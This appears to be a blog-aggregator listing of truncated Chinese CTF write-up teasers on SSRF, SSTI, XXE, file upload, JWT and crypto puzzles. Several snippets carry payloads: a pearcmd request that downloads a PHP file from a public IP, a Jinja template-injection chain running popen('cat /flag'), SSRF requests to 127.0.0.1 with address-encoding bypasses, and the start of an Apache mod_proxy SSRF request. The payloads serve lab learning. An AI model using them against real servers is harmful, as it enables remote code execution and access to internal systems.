ctfshow_ssrf ctfshow ssrf 351

CTFSHOW_萌新 密码3

题目名称:我想吃培根 题目描述: -- .-. ... . ..--.- .. ... ..--.- -.-. .-.. ..--.- -... ..- - ..--.- -... .- -.-. -. ..--.- .. ... ..--.- -.-. .-.. . .-. ..--.- -- - ......
密码 CTFSHOW

CTFSHOW_萌新_密码1

栅栏密码 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式:KEY{XXXXXXXXXXXXXX} 十六进制,想到 bas ......
密码 CTFSHOW

CTFshow 萌新web22

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload: http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php: `"; ?>` 上传成功后显示: ``` do ......
CTFshow web 22

CTFshow misc1-10

小提示:需要从图片上提取flag文字,可以通过截图翻译或者微信发送图片,这两个的ai图像识别挺好用的。 misc1: 解压打开就能看见flag,提取出来就行 misc2: 记事本打开,看见 ng字符,尝试更改后缀为.png,重新打开看见flag misc3: 题目为bpg文件,使用一些看图软件可以打 ......
CTFshow misc1 misc 10

全面解读SSRF

### 一、简介: ​ SSRF (Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造,由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。 #### 1.1、漏洞产生原理: ​ SSRF 形成的原因大都是由于服务端提 ......
SSRF

SSRF内容

SSRF(Server-Side Request Forgery) 服务器端请求伪造 在服务器上的文件发起的请求访问本机或其他机器上的文件 攻击者构造形成由服务端发起请求的安全漏洞 相关函数 curl_exec 可以执行cURL会话,返回网站代码 用途:爬虫、获取接口数据、FTP下载文件 使用时需要 ......
内容 SSRF

ABC351D_MagicalCookies

# [**Magical Cookies**](https://atcoder.jp/contests/abc315/tasks/abc315_d) 根据问题的描述,如果在判断同一行或同一列的所有饼干是否具有相同颜色时,选择了时间复杂度为 $\Theta(H)$ 或 $\Theta(W)$ 的方法, ......
D_MagicalCookies MagicalCookies ABC 351

ctfshow-web入门-信息搜集

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截,右键查看源代码和f12均失效,两种方 ......
ctfshow-web ctfshow 信息 web

ctfshow-web入门-sql注入-SELECT模块

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹, ......
ctfshow-web 模块 ctfshow SELECT web

Apache HTTP Server mod_proxy SSRF漏洞复现CVE-2021-40438

# Apache HTTP Server mod_proxy SSRF漏洞复现CVE-2021-40438 ## 漏洞利用 `利用条件:`apache v2.4.48及以下版本 `paylaod:可改-SSRF` ``` GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAA ......
漏洞 mod_proxy Apache Server 40438

Web通用漏洞--SSRF

# Web通用漏洞--SSRF ## 漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 一种由攻击者构造形成由服务端发起请求的一个安全漏洞; 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而 ......
漏洞 SSRF Web

ctfshow--web入门--XXE

# ctfshow--web入门--XXE ## web373 源码 ```php loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //解析xml文档 $creds = simplexml_import_dom($dom); $ctfshow = ......
ctfshow XXE web

ctfshow--web入门--文件上传

# ctfshow--web入门--文件上传 ## web151(前端校验) 题目中提示前端检验不可靠,应该对前端检验进行绕过 ![在这里插入图片描述](https://img-blog.csdnimg.cn/608e51750ded43f2aefc1c2a66a3e803.png) 检查前端代码进 ......
ctfshow 文件 web

ctfshow_SSRF(web351-360)

# ctfshow-SSRF #### web351 flag在flag.php下,直接访问没有权限 使用curl_exec访问才有权限 > url = http://127.0.0.1/flag.php #### web352 开始上过滤了 使用`0.0.0.0`访问本机上的服务 > url = ......
ctfshow_SSRF ctfshow SSRF 351 360

ctfshow_JWT(Web345-350)

## jwt介绍 对json格式的信息采取的一种编码 JWT:Json web token 由两个点分隔成三个部分,分别为: - Header - Payload - Signature: 如果在Header部分声明的签名算法为HS256,以及服务器约定使用的密钥为secret 那么签名使用的算法一 ......
ctfshow_JWT ctfshow JWT 345 350

CTFSHOW-SSTI

# CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` ......
CTFSHOW-SSTI CTFSHOW SSTI

ctfshow--web入门--文件上传

# ctfshow--web入门--文件上传 [TOC](目录标题) ## web151(前端校验) 题目中提示前端检验不可靠,应该对前端检验进行绕过 ![在这里插入图片描述](https://img-blog.csdnimg.cn/608e51750ded43f2aefc1c2a66a3e803. ......
ctfshow 文件 web

ssrf-bypass

第一道url bypass 不太懂,搜攻略 攻略说用@,也没解释,咱自己搜搜 大概就是忽略了url=到@前面这段,最后访问的还是127.0.0.1/flag.php 下一道,数字ip bypass 都提醒了十进制,试试别的进制 16进制:0x7F.0x00.0x00.0x01 顺便试了192.168 ......
ssrf-bypass bypass ssrf

ssrf-协议篇

书接上回,ssrf的post请求 经过了上次的hackbar尝试,发现不行,百度半天都是上来就用一个什么gopher协议,也没看到哪个说明白为啥要用gopher 这gopher也不像file啥的直接读,它同样是传个post,怎么就非得用它了 这里也看了两个文件的源代码 最后想了想可能是post和ge ......
ssrf

2023-7-28、29 文件监控和ssrf

27晚上+28、29写了个文件监控的脚本,目前除了基本的监控只有自动删除新增文件和自动恢复被删文件的功能 这点ssrf是28号的,先发了,要不不知道要拖到啥时候,等明天把脚本和剩下的发了 ssrf 进去之后是这样的 让我们访问flag.php 只能来自127.0.0.1 伪协议 直接读试试 提示里说 ......
文件 2023 ssrf 28

CSRF和SSRF

# CSRF和SSRF ## 一、CSRF CSRF(Cross-Site Request Forgery)也叫做跨站请求伪造。当用户登录某个网站,并且点击了该网站上面含义恶意代码的链接,就会跳转到第三方网站,这个网站冒用已登录用户的身份,直接对服务器接口发起请求,获得敏感信息等操作。 ![](ht ......
CSRF SSRF

csrf&ssrf

csrf:是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览 ......
csrf ssrf amp

SSRF

简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人 原理 攻击者通 ......
SSRF

WEB漏洞—CSRF及SSRF漏洞案例

CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该 ......
漏洞 案例 CSRF SSRF WEB

CTFshow—武穆遗书

# 武穆遗书 将exe文件放入exeinfo查看该执行文件被加了upx壳 ![image-20230609135243529](https://img2023.cnblogs.com/blog/2957075/202306/2957075-20230609161200627-1534549460.p ......
遗书 CTFshow

CSRF与SSRF

# CSRF与SSRF ## CSRF(跨站请求伪造) 跨站请求伪造(Cross-site request forgery,CSRF),它强制终端用户在当前对其进行身份 验证后的Web应用程序上执行非本意的操作。CSRF攻击的着重点在伪造更改状态的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的 ......
CSRF SSRF

攻防世界SSRF_ME

首先看一下md5截断: substr(md5(captcha), -6, 6) == "4c3d26",表示从字符串倒数第6位开始,往后截取6位 captcha是验证码的意思,一般是数字,所以可以直接爆破数字 import hashlib for i in range(1000000): if ha ......
SSRF_ME 世界 SSRF ME

SSRF

> 参考: > > https://xz.aliyun.com/t/6235 > > https://portswigger.net/web-security/ssrf ## 0x01 SSRF漏洞基础学习 ### 1、SSRF概述 ​ SSRF(Server-Side Request Forger ......
SSRF

[第三章 web进阶]Python里的SSRF

一、运行靶机 发现没有有效界面信息,这个时候查看靶机说明信息,在说明信息里面明确提到访问容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag 二、根据提示信息访问url 由于提示信息中提到url path,则可以尝试设置参数名为url ?url ......
第三章 Python SSRF web

(ssrf)服务器端请求伪造漏洞总结

服务器端请求伪造 **原理:** 服务端代理用户对用户输入的URL无条件发起请求,并将response返回给用户。用户可以填写内网的任意IP以及端口,用来进行内网嗅探; 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统 危害大,比较常用,杀伤力非常大,和log4j2差不多 是一种由攻击者构造 ......
漏洞 服务器 ssrf